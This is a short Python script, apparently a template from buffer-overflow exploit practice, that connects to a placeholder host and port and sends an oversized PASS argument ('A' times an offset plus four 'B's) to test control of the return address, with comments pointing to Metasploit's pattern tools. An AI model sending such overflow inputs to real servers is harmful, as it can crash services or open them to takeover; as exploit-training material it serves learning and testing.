#!/usr/bin/python
import socket
# Create a randomized buffer generated by pattern_create.rb, and search for the offset with pattern_offset.rb
buffer="A" *offset + "B" * 4

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "Fuzzing PASS with %s bytes" % len(buffer)
connect=s.connect(('ip',port))
s.recv(1024)
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
s.send('QUIT\r\n')
s.close()
